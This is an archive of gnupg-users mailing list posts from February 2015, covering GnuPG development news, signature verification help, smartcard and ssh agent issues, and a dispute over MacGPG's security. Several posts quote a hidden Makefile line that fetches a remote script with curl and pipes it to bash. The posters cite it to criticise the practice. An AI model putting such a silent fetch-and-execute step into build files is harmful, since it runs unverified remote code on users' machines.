GnuPG News for January 2015
Hi! Find below the plain text version of https://gnupg.org/blog/20150216-gnupg-in-january.html Shalom-Salam, Werner 1 GnuPG News for January 2015 ═ This is the first issue of a series of status reports for the GnuPG project. It is quite late for a review of things which happened January but unexpected (but meanwhile widely known) events prohibited me from writing this earlies. More on this in another article. First the good news: In January I was contacted by the [Core Infrastructure Initiative] with an offer to help funding the GnuPG development. I gladly accepted that that offer for 60,000 USD for this year. After short and exceptionally non-bureaucratic negotiations we agreed on a contract which pays [g10^code] 5,000 USD each month in 2015 for work on GnuPG. That money will be used to pay my, now increased, salary. Thanks guys. After the release of GnuPG 2.1.1 in late December quite some bugs were reported for this new branch. Thus most of my work was related to fixing these bugs and prepare a bug fix release. As usual Niibe Yutaka helped a lot by taking care of the smartcard part and reviewing other patches and bugs. Some minor bugs and memory leaks were fixed in that time as well as some code cleanup. The move to automake 1.14 and gcc 4.9 required a bit of work. The update to the latest automake version was originally planned after the release of Debian Jessie but for other reasons I had to update my development box to to-be-Jessie already now and thus switching automake was done right away. This required only minor changes but with all those libraries required by GnuPG 2.x, it nevertheless took some days. At that opportunity all the build-aux files (config.guess et al.) were also updated to the latest version. The code base is now quite up to the latest development tools (at least in the repo). gcc 4.9 prints a couple of new warnings and thus a few other code changes were required as well. I also took some days to play with the Windows port but finally decided that there won't be a Windows installer for the forthcoming 2.1.2 versions. We need to investigate on how to best package the Windows binary version without having too much dependencies to external libraries. In particular GPGME with its dependencies on Glib is still troublesome and this might need some re-packaging of GPGME. The general idea for the 2.1 installer will be to package only the GnuPG core without any GUI stuff and do that in a way which helps other packages to use that one GnuPG version on Windows. This has the huge advantage that we can release updates to GnuPG without having also to update all the other software which uses GnuPG under the hood. After having fixed a couple of build problems of OS X, Patrick Brunswick of Enigmail is meanwhile able to build an OS X installer soon after a new GnuPG release and thus a link to this installer has been added to the download page. To allow for a one-stop key generation we also came up with an easy way to generate a key without having to resort to Pinentry. Even after 15 or so years of the `--command-fd' based API to gpg, the first request was filed to provide a stable interface to select the algorithm: gpg has always printed a list of algorithm sets and asked the user to enter the order number to select the algorithms. However, there was no way for a script to map algorithm names to these order numbers. It is surprising that it took so long until someone requested a solid way of entering that. It has been solved by assigning fixed strings (see doc/DETAILS) to each algorithm and allowing this string as an alternative to the order number. Please do not hesitate to ask on gnupg-devel@ for advise or ask for a new feature. If a new feature makes sense and fits into the overall architecture then there is quite some chance that it will be added. But we need to know about it. Like in many years, January closed at that great hackers meeting in Brussels. Maybe next year there will be enough interest for a GnuPG session and a booth as [FOSDEM]. [Core Infrastructure Initiative] http://www.linuxfoundation.org/programs/core-infrastructure-initiative [g10^code] https://g10code.com [FOSDEM] https://fosdem.org -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
Hi, Christopher, Am 16.02.2015 um 13:01 schrieb Christopher Beck: Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...). Ah sorry, the previous mail still was MIME. Now it's inline. The signature of this (inline) message was automatically marked as correct by Enigmail, whereas the PGP/MIME tend to give a failure, at least, that's what it looks like at first glance. I will check my Enigmail settings, maybe there's something wrong with them. Thanks Stephan signature.asc Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: SSH generic socket forwarding for gpg-agent
On Mon 2015-02-16 05:12:08 -0500, Werner Koch wrote: On Mon, 16 Feb 2015 06:08, d...@fifthhorseman.net said: My suggestion is to do prompting, but not to require the full passphrase for each use. Okay, that is then similar to the confirm flag for the sshcontrol. yes, exactly. --dkg ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
Am 16.02.2015 um 00:01 schrieb Damien Goutte-Gattat: What's wrong with what I am doing? You provide GnuPG with only the *signature*. You need to also give it the *signed data* (the message) so that it can perform the verification. If you want to do that manually (something you don’t usually do with PGP/MIME signatures, since it’s quite cumbersome): In addition to what you have already done (saving the signature itself in “signature.asc”), you must also extract the MIME part that was signed. Thanks, Damien, now my GPG (stand-alone) has verified the signature, telling me BAD signature. I don't know why, but I do not worry (too much). Stephan signature.asc Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
Am 16.02.2015 um 13:53 schrieb Philip Jackson: [...] What's wrong with what I am doing? With the expression you used, (gpg --verify signature.asc), gpg will look for a similarly named data file in the same directory where you saved signature.asc. Is that data file (the signed email) present there or is it still in your email client ? Since gpg replies that 'no valid opengpg data found' it would seem that you saved the signature.asc file in some convenient place completely removed from the email concerned and gpg couldn't make the connection. In any case, the Beckus signed emails do check fine with good signature in my thunderbird/enigmail client. Thanks, Philip, I already replied to Damien's message, but, indeed, I forgot to copy the text into the same directory. Stephan signature.asc Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpg-agent does not authenticate ssh connections
According to the error message gpg-agent is unable to sign using the card: ssh user@server Agent admitted failure to sign using the key. Permission denied (publickey,keyboard-interactive). I had a look on the card with pksc15-tool (removed irrelevant parts): PKCS#15 Card [OpenPGP Card]: Version: 0 Serial number : XXX Manufacturer ID: OpenPGP project Language : de Flags : PRN generation, EID compliant PIN [Signature PIN] Object Flags : [0x3], private, modifiable ID : 01 Flags : [0x13], case-sensitive, local, initialized Length : min_len:0, max_len:32, stored_len:32 Pad char : 0x00 Reference : 1 Type : ascii-numeric Path : 3f00 Tries left : 3 PIN [Encryption PIN] Object Flags : [0x3], private, modifiable ID : 02 Flags : [0x13], case-sensitive, local, initialized Length : min_len:0, max_len:32, stored_len:32 Pad char : 0x00 Reference : 2 Type : ascii-numeric Path : 3f00 Tries left : 0 Private RSA Key [Authentication key] Object Flags : [0x3], private, modifiable Usage : [0x200], nonRepudiation Access Flags : [0x1D], sensitive, alwaysSensitive, neverExtract, local ModLength : 1024 Key ref: 2 (0x2) Native : yes Auth ID: 02 ID : 03 For me it looks like the authentication private key uses the encryption pin (Auth ID 0x02) while it should use the signature pin. It tried to set the encryption pin via pkcs15-tool --auth-id 02 --change-pin but this did not work: PIN code change failed: Data object not found. It seems the encryption pin is not supported by gnupg. Is there any way to change the authentication key to use the signature pin? On mu Gnupg card is only the autentication key present, all other keys are currently empty. May this happen due to the empty slots and may be fixed when I add an encryption key to the card? ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: moving up from 2.0.26 to 2.1.1
I passed an interesting Sunday afternoon : removed gnupg2.0.26 and attempted to replace it with gnupg-2.1.2. The experience was not entirely successful. I got the updated libraries installed using configure/make/checkinstall. I used checkinstall because various howto articles on ubuntu's wiki recommend it and deprecate the older 'make install'. Checkinstall offered the advantage (or so it seemed to me) of producing a deb package which when installed could be easily identified by the package management system - all the easier to remove it later if needed. Sure enough, for the libraries involved, Synaptic Package Manager recognizes these packages installed in the /usr/local/... region of the file system. However, when it came to using checkinstall on the gnupg-2.1.2 build, the deb package installed itself OVER the distro's gnupg-1.4.16. So the end result was a gain of 2.1.2 together with a loss of 1.4.16. Eventually, after re-installing 1.4.16 for a third time, and going back to 'make install', I got 2.1.2 installed without losing 1.4.16. 2.1.2 started up and looked good until I tried to do something with it and then it could not get gpg-agent running : gpg-agent: error while loading shared libraries: libnpth.so.0: cannot open shared object file: No such file or directory libnpth.so.0 is certainly present in /usr/local/lib/. Then I ran out of time - put the distro standard version back into service and went back to life (until next time). Philip signature.asc Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Please remove MacGPG from gnupg.org due to serious security concerns
Hi! I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns. Basically, the first thing the Makefile in all their repos / tarballs does is this: @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh) So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile. Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc. The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security. I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it. -- Jonathan ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Please remove MacGPG from gnupg.org due to serious security concerns
I'm guessing because you need an SSH key at GitHub in order to pull via SSH. Yet another problem solved by git modules. Still, they could have at least changed it to https. GitHub supports pull/push via SSH or HTTPS therefore you can do this to with MacGPG (2) or any GitHub repo. However, I'd recomend that you go over the proper support channels first (rather than merely twitter) before asking that references to the proyect are deleted. There must be lots of MacGPG users and most of them probably use the GPG suite, because it is GUI based (also more user friendly, unlike GnuPG) and it would not be fair on them to unilaterally remove the link to GnuPG or to receive some kind of security warning without raising the issues you mention with the people who are actively developing and maintaining the source. Sandeep signature.asc Description: Message signed with OpenPGP using GPGMail ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Please remove MacGPG from gnupg.org due to serious security concerns
Hi I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible. They do care about security and are very responsive to posts on the GPG Tools support forum http://support.gpgtools.org/ The GitHub issues page for MacGPG is not the main places where issues are raised, it’s actually the support forum, where there are lots of other resources as well. Sandeep Murthy s.mur...@mykolab.com On 16 Feb 2015, at 21:48, Jonathan Schleifer js-gnupg-us...@webkeks.org wrote: Hi! I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns. Basically, the first thing the Makefile in all their repos / tarballs does is this: @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh) So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile. Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc. The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security. I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it. -- Jonathan ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users signature.asc Description: Message signed with OpenPGP using GPGMail ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Please remove MacGPG from gnupg.org due to serious security concerns
On 2015-02-16 22:48, Jonathan Schleifer wrote: Hi! I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns. Basically, the first thing the Makefile in all their repos / tarballs does is this: @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh) So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile. Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc. The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security. I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it. -- Jonathan It is true that there's a pretty big security hole there with git clone git://github.com..., since any malicious attacker can intercept that communication. There's no checksuming or anything to make this difficult *at all*. What *does* suprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either: https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b However, I'd recomend that you go over the proper support channels first (rather than merely twitter) before asking that references to the proyect are deleted. As stated on https://gpgtools.org/: Please report any issues you find on our support platform. Which points to http://support.gpgtools.org/. Cheers, -- Hugo Osvaldo Barrera A: Because we read from top to bottom, left to right. Q: Why should I start my reply below the quoted text? signature.asc Description: PGP signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Please remove MacGPG from gnupg.org due to serious security concerns
Am 17.02.2015 um 00:53 schrieb Hugo Osvaldo Barrera h...@barrera.io: It is true that there's a pretty big security hole there with git clone git://github.com..., since any malicious attacker can intercept that communication. There's no checksuming or anything to make this difficult *at all*. Well, this is only checking out the code. While I agree that this is dangerous, the curl | sh paradigm is even more dangerous. What *does* suprise me is that there's a commit to specifically remove git+ssh in favour of insecure ssh. There's no comment on why that was done either: https://github.com/GPGTools/GPGTools_Core/commit/5186bade36acedfdc0b76f9f5ddfcfc004ec698b I'm guessing because you need an SSH key at GitHub in order to pull via SSH. Yet another problem solved by git modules. Still, they could have at least changed it to https. However, I'd recomend that you go over the proper support channels first (rather than merely twitter) before asking that references to the proyect are deleted. As stated on https://gpgtools.org/: Please report any issues you find on our support platform. Which points to http://support.gpgtools.org/. Well, I think there's enough evidence that they do not know how to do things securely. It has even been pointed out in this thread that this is not the first time there are serious security problems. It feels like they are actively trying to make it insecure, because they do things that normally nobody working on a security product would even consider. Please consider this: GnuPG is a security product. People's lives might depend on it. They might have heard that GnuPG is secure and think they are safe since even Snowden uses it. They go to gnupg.org and then download MacGPG. That's dangerous and there's no way for them to know unless they go check the source. As a matter of fact, I compromised one of my machines by checking out one of the MacGPG tools, checking the checksum of the downloaded tarball and then typing make. I did not realize it executed remote code (twice even, the curl and the git checkout, on which make is also run later on). They even actively hide the fact, which makes it even worse. Should gnupg.org really endorse that? -- Jonathan ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Please remove MacGPG from gnupg.org due to serious security concerns
Am 17.02.2015 um 00:16 schrieb Sandeep Murthy s.mur...@mykolab.com: I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible. On the one hand, you think it's an exaggeration, on the other, you can list even more examples. I mean, they don't even do the most basic security practices which are common in basically all projects these days, even non-security related projects. And we're talking about a security related project here! If someone clearly demonstrates even lack of the most basic security measures, why should that someone be trusted with way more complex stuff? You listing they had problems in the past basically only strengthens the argument that they are not to be trusted and should not be endorsed. They do care about security and are very responsive to posts on the GPG Tools support forum Really? Somebody caring about security executing remote code? Rather than using git submodules (which exist for how many years?), they prefer executing remote code that then downloads more code using an unverified channel. This can't be just laziness (using git submodules is less work), but looks like somebody even put a lot of effort into failing at security. How can you call that caring about security? If you'd argue they care a lot about being insecure, I'd agree though, because they actually seem to put a lot of effort into that… http://support.gpgtools.org/ If you are a security project, you should be thankful for people reporting bugs, not trying to make it as hard as possible to report a serious bug. This looks like more of a users help users forum kind of thing, nothing where you would want to report a bug. -- Jonathan ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
2.1.2: keyserver route failure
Is there any explanation for this behavior, or is this a 2.1.2 bug? (This is using Patrick's OS X package, if that matters. It also affects all keyservers I tested, not just the round-robin front-end.) quorra:~ rjh$ gpg - --keyserver x-hkp://pool.sks-keyservers.net --recv-key 0xD6B98E10 gpg: using character set 'utf-8' gpg: keyserver receive failed: No route to host quorra:~ rjh$ ping pool.sks-keyservers.net PING pool.sks-keyservers.net (140.211.169.202): 56 data bytes 64 bytes from 140.211.169.202: icmp_seq=0 ttl=55 time=102.879 ms ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Fwd: Please remove MacGPG from gnupg.org due to serious security concerns
If you have concerns or suggestions then the best thing would be to contact Luke Le, Steve or the other support staff on http://support.gpgtools.org/ Sandeep Murthy s.mur...@mykolab.com Begin forwarded message: Subject: Re: Please remove MacGPG from gnupg.org due to serious security concerns From: Sandeep Murthy s.mur...@mykolab.com Date: 16 February 2015 23:16:06 GMT Cc: js-gnupg-us...@webkeks.org To: gnupg-users@gnupg.org Hi I think this is an exaggeration. I have been using MacGPG and the GPG Tools support forum for quite some time, and have brought a number of issues to their attention, including a couple of security related ones, like making their key fingerprints more visible. They do care about security and are very responsive to posts on the GPG Tools support forum http://support.gpgtools.org/ The GitHub issues page for MacGPG is not the main places where issues are raised, it’s actually the support forum, where there are lots of other resources as well. Sandeep Murthy s.mur...@mykolab.com On 16 Feb 2015, at 21:48, Jonathan Schleifer js-gnupg-us...@webkeks.org wrote: Hi! I hereby request that MacGPG gets removed from gnupg.org due to serious security concerns. Basically, the first thing the Makefile in all their repos / tarballs does is this: @bash -c $$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh) So you type make not expecting anything bad (you verified the checksum and everything), but you just executed remote code. Great. And they even hide it from you by prefixing it with @, which is downright evil. So you never notice unless you look at the Makefile. Currently, that script clones another common repo using the unverified git:// protocol (because, why use submodules if you can do it in an insecure way?), but obviously, that can change any minute and could change just for certain IPs etc. The developer(s) don't allow any issues on GitHub, so I tried contacting them by other means (e.g. Twitter), only to get ignored. They clearly don't care about security. In any case, somebody who does something like this clearly doesn't care about security the least. The potential for backdoors is extremely high and I think nobody should be using any software written by this developer / these developer(s), as they clearly demonstrated that they couldn't care less about your security. I don't feel comfortable that the majority of Mac users are using this software which doesn't care for security at all, but is used for extremely security sensitive tasks. I guess this is because gnupg.org recommends it and therefore people think it's safe. I think gnupg.org should do the contrary instead and strongly discourage using it. -- Jonathan ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users signature.asc Description: Message signed with OpenPGP using GPGMail ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 On Monday 16 February 2015 at 5:38:08 AM, in mid:m0lhjy8lhb@kcals.intra.maillard.im, Xavier Maillard wrote: One more argument in favor of the inline: it questions my fellows; what are these cabalistic caracters and then you can what's the purpose of all of this. I like that advantage of keeping it all visible in the message body. But don't recall ever having been asked the question. - -- Best regards MFPAmailto:2014-667rhzu3dc-lists-gro...@riseup.net Man is not a rational animal, he is a rationalising animal. -BEGIN PGP SIGNATURE- iQF8BAEBCgBmBQJU4oiQXxSAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXRCM0FFN0VDQTlBOEM4QjMwMjZBNUEwRjU2 QjdDNzRDRUIzMUYyNUYwAAoJEGt8dM6zHyXw3/QH+wWOd7nCCLPCs5Ae2pj+W5kZ b/j02U9oQmunl2COpKsF+/Apy1pcZ9Zi6YKFH9nAzeyV7QuZJJdtg52m5r9/5ZFv BiYntEDJBeQtGB/uJ00OhtI09NU1oGwILv4UmXubScrxF3GFY2Ib62GB6Nl7JTEC Zd+L72hF7Qf4hZhjMMRJKAD/9XnkTZ5KNulHcCAPUberzoheIT8BzeuCYobJR+OH 8wMH62MqBnSERR4ppknlEOu1+95zjYMyOgn6zXR4xpPnNzfK+80/UmVYloHYxhbU 5xL85SX6abCC3mx9tcpqCn35t1afcyc3fhAT7GjnH6vNLG7zTxdlx/gY4fODabuI vgQBFgoAZgUCVOKIn18UgAAuAChpc3N1ZXItZnByQG5vdGF0aW9ucy5vcGVu cGdwLmZpZnRoaG9yc2VtYW4ubmV0MzNBQ0VENEVFOTEzNEVFQkRFNkE4NTA2MTcx MkJDNDYxQUY3NzhFNAAKCRAXErxGGvd45KtZAQCh3eIW7ts4093r4hI3EAVFG2bS 8++QE9IohrSvhPVPoQEAdDQxj8hclIhZbXNImWMJ4PN0UZ4yvOaThLLZ0yBvOQI= =z/ea -END PGP SIGNATURE- ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
On 15/02/15 22:42, Stephan Beck wrote: Hi, Christopher, Am 15.02.2015 um 20:14 schrieb Christopher Beck: On Sunday 15 February 2015 16:30:33 Stephan Beck wrote: Am 15.02.2015 um 12:26 schrieb Ludwig Hügelschäfer: On 14.02.15 23:05, Stephan Beck wrote: Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there where bug reports on both implementations). Well, I'am just about tu figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that... Beckus I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12 Steps to reproduce the event: 1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here. 2) I open the header of your message. 3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc) 4) I type gpg --verify beckus_sig.asc (or signature.asc) 5) gpg outputs: No valid OpenPGP data found. Signature verification failed. (I am retranslating that into English,so please be kind with any imprecision you may find). What's wrong with what I am doing? With the expression you used, (gpg --verify signature.asc), gpg will look for a similarly named data file in the same directory where you saved signature.asc. Is that data file (the signed email) present there or is it still in your email client ? Since gpg replies that 'no valid opengpg data found' it would seem that you saved the signature.asc file in some convenient place completely removed from the email concerned and gpg couldn't make the connection. In any case, the Beckus signed emails do check fine with good signature in my thunderbird/enigmail client. Philip signature.asc Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: SSH generic socket forwarding for gpg-agent
On Mon 2015-02-16 02:50:15 -0500, Doug Barton wrote: On 2/15/15 11:41 PM, Daniel Kahn Gillmor wrote: In situations where you want to make sure that you know (and approve of) the use of the agent by the remote machine, you'd like a prompt to appear within your (local, trusted) environment. agent forwarding is off by default, and has to be enabled either on the command line, or in a config file. Why is further user interaction on this point necessary/desirable? Because saying i want to forward my agent to remote system X so that i can sign a couple of specific messages on that host is different than saying i want to forward my agent to remote system X so that X can make as many uses of my agent's secret key material as can be pushed down the network pipe. We're now explicitly enabling people to forward the agent (e.g. --extra-socket in gpg-agent(1)); we should be providing appropriate usage controls to accompany that functionality. --dkg ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] GnuPG 2.1.2 released
On Friday 13 February 2015 at 20:23:26, Werner Koch wrote: This was ment to read GnuPG-2.1.2 I guess, because of No, this describes what is new in the 2.1 branch. 2.1.2 is basically a bug fix release. Just wanted to point out that the release announcement left me confused at a few points. If it confused me (as a long time GnuPG User/Contributor) I assume it will confuse many others as well. To restate, I was confused about * What the items in section What's New in GnuPG-2.1 actually meant, it were the differencen 2.1.1 to 2.1.2 as I could figure out, but this wasn't clear from the text. * This version fixes a lot of bugs found after the release of 2.1.0 which probably should have been 2.1.1. Overall I believe the announcement as too much text that stays the same for each release. It would benefit from being focussed on the key differences and let the rest be a standard doc part. Best, Bernhard ps.: Congrats on the taz article (in German) I've added the link to the wiki. -- www.intevation.de/~bernhard (CEO)www.fsfe.org (Founding GA Member) Intevation GmbH, Osnabrück, Germany; Amtsgericht Osnabrück, HRB 18998 Owned and run by Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner signature.asc Description: This is a digitally signed message part. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: SSH generic socket forwarding for gpg-agent
On Mon, 16 Feb 2015 06:08, d...@fifthhorseman.net said: My suggestion is to do prompting, but not to require the full passphrase for each use. Okay, that is then similar to the confirm flag for the sshcontrol. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
On Sun, 15 Feb 2015 19:56:21 -0800, Doug Barton stated: I get that you have a preference, and personally I don't care how you sign your messages. But as I stated before, it really bothers me when the zealots (on either side) misrepresent the facts in order to bolster their case. I agree Doug, and I think this debate has gone on long enough. We are each free to use what ever method we feel most at ease with. Until an RFC is released definitively declaring one type obsolete, who really cares. -- Jerry That guy's gotta stop... He'll see us. Said to friend Rolf Wütherich in 1955 after being advised to slow his driving speed, moments before a head-on collision took his life. pgpGVmrS6F6cj.pgp Description: OpenPGP digital signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Monday 16 February 2015 12:32:49 Christopher Beck wrote: On Sunday 15 February 2015 22:42:09 Stephan Beck wrote: Hi, Christopher, Am 15.02.2015 um 20:14 schrieb Christopher Beck: On Sunday 15 February 2015 16:30:33 Stephan Beck wrote: Am 15.02.2015 um 12:26 schrieb Ludwig Hügelschäfer: On 14.02.15 23:05, Stephan Beck wrote: Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there where bug reports on both implementations). Well, I'am just about tu figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that... Beckus I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12 Steps to reproduce the event: 1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here. 2) I open the header of your message. 3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc) 4) I type gpg --verify beckus_sig.asc (or signature.asc) 5) gpg outputs: No valid OpenPGP data found. Signature verification failed. (I am retranslating that into English,so please be kind with any imprecision you may find). What's wrong with what I am doing? Stephan Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...). Ah sorry, the previous mail still was MIME. Now it's inline. - -- I use GnuPG (GPG) for E-Mail encryption and signing. If you want some privacy, my public key ID is 2F9D4F14. The file singature.asc this message includes contains a cryptographic signature which enables you to verify this E-Mail really was written by me. Christopher Beck Gerhart-Hauptmann-Str. 1 91058 Erlangen Tel.: 09131 / 9245437 Fax.: 09131 / 8148708 Jabber: bec...@jabber.org EPVPN: (+49 221 59619) - 5232 -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQEcBAEBAgAGBQJU4dwUAAoJEC5gOMAWHIcpIPIH/ilt/1RgO8mbSNinLXogUhvg QEIIjCmG9GzyiO3F3qy+Ni0rW1drMhQAjITzfqwM+oz1q7IC8KSIAS7FhbGNVL7N sVB/qBp+TVCldIl9QeCLtHcd73+hx024OqhHeFwl/R8fLw6vmfz7FOgTbooX226J MmG7XdnBuuv+01ApvYRn0eOuKwM0nZZj/7qjORql2BtOa1+QxRX8D0vDIpF98JS5 xk3R+Mc9Zxb1xFDDjLVQMf7mgbjNdyodNYe3CMpRWZRID5us46MKGmMK2lg4c0LX eMDZWhFQz9fzYoyGT0uwvMh0YFUJFQeuaXRInWhIJVcFLbXFAntUGYOKDawIEN4= =Ht2o -END PGP SIGNATURE- ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: MIME or inline signature ?
On Sunday 15 February 2015 22:42:09 Stephan Beck wrote: Hi, Christopher, Am 15.02.2015 um 20:14 schrieb Christopher Beck: On Sunday 15 February 2015 16:30:33 Stephan Beck wrote: Am 15.02.2015 um 12:26 schrieb Ludwig Hügelschäfer: On 14.02.15 23:05, Stephan Beck wrote: Sometimes my signatures are being counted as bad ones. But I figured out it is a bug on kmail or enigmail (there where bug reports on both implementations). Well, I'am just about tu figure it out, so there may be another issue instead of them both. According to the question in the topic: inline signatures always worked, MIME didn't. I still wonder why, and after my next exams I'll investigate on that... Beckus I try to be extremely clear. I cannot verify your signature, neither with Enigmail nor using gpg stand-alone. My version is 1.4.12 Steps to reproduce the event: 1) I import your key using your key-ID from within gpg 1.4.12 typing gpg --recv-keys [your key id], result: gpg has imported your key, everything's all right here. 2) I open the header of your message. 3) I copy the signature and save it as a beckus_sig.asc file using a simple text editor (or, optionally, as signature.asc) 4) I type gpg --verify beckus_sig.asc (or signature.asc) 5) gpg outputs: No valid OpenPGP data found. Signature verification failed. (I am retranslating that into English,so please be kind with any imprecision you may find). What's wrong with what I am doing? Stephan Hi, now I'll use the inline format. If you can now verify my signature, this still could be the same bug (or whatever it is...). -- I use GnuPG (GPG) for E-Mail 